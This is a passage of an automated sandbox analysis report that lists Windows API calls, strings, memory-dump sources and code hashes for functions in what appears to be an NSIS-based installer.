                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                          • MulDiv.KERNEL32(00009E00,00000064,000B7868), ref: 00402FE1
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                          • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                                                          • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                          • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                                                          • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1354259210-0
                                                                                                                                                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                                          • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                          • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                                                                                          • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                          • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                                                                                          • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                          • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                                                                                          • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                                                                                          • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404DF7
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                          • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                                                          • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                                                                                                                          • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E12
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 2659869361-3081826266
                                                                                                                                                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                          • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                                                                                          • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                                                                                          • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405F51
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EF8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
